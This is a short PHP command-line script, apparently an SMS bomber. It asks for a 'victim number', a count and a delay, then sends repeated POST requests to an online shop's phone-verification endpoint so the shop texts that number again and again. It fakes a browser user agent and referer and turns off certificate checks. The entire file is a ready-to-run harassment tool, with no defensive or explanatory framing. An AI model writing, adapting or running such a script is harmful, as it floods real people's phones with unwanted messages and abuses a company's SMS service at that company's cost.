<?php
function spammm($no, $jum, $wait){
    $x = 0; 
    while($x < $jum) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL,"http://sc.jd.id/phone/sendPhoneSms");
        curl_setopt($ch, CURLOPT_POST, 1);
        curl_setopt($ch, CURLOPT_POSTFIELDS,"phone=".$no."&smsType=1");
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
		curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
        curl_setopt($ch, CURLOPT_REFERER, 'http://sc.jd.id/phone/bindingPhone.html');
        curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36');
        $server_output = curl_exec ($ch);
        curl_close ($ch);
		echo $server_output."\n";
        sleep($wait);
        $x++;
        flush();
    }
}
echo "\033[1;31m[*] \033[1;32mENTER VICTIM NUMBER \033[1;31m[*] \n";
echo "\033[1;33m[+] \033[1;35mEx:628XXX \033[1;33m[+]\n[#]═> ";
$number = trim(fgets(STDIN));
echo "Amount?\nInput : ";
$amount = trim(fgets(STDIN));
echo "Jeda? 0-99999 (ex:1)\nInput : ";
$pause = trim(fgets(STDIN));
$execute = spammm($number, $amount, $pause);
print $execute;
print "\033[0m[\033[32m✓\033[0m] DONE SEND \033[0m[\033[32m✓\033[0m]\n";
?>
